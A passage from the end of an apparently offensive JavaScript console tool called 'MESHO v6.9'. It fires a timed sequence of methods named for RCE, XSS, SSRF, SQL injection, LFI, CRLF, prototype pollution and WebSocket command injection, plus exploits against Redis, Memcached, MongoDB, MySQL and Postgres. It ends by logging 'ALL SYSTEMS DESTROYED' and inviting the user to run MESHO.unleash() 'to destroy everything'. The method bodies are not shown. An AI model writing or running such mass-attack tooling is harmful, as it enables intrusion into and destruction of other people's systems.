  setTimeout(()=>this.zd6(),500);setTimeout(()=>this.zd7(),600);
  setTimeout(()=>this.zd8(),700);setTimeout(()=>this.pp(),800);
  setTimeout(()=>this.rce(),900);setTimeout(()=>this.injectXSS(),1000);
  setTimeout(()=>this.dumpMemory(),1100);setTimeout(()=>this.protoChain(),1200);
  setTimeout(()=>this.ssrf(),1300);setTimeout(()=>this.sqlI(),1400);
  setTimeout(()=>this.xxs(),1500);setTimeout(()=>this.crlf(),1600);
  setTimeout(()=>this.lfi(),1700);setTimeout(()=>this.prototypePollutionDeep(),1800);
  setTimeout(()=>this.wsAuthBypass(),1900);setTimeout(()=>this.wsCommandInjection(),2000);
  setTimeout(()=>this.wsRedisExploit(),2100);setTimeout(()=>this.wsMemcachedExploit(),2200);
  setTimeout(()=>this.wsMongoExploit(),2300);setTimeout(()=>this.wsMySqlExploit(),2400);
  setTimeout(()=>this.wsPostgresExploit(),2500);
  setTimeout(()=>console.log('[MESHO] ALL SYSTEMS DESTROYED'),3000)}};

setTimeout(hook,300);console.log('[MESHO v6.9] 0xMesho loaded. Type MESHO.unleash() to destroy everything')})();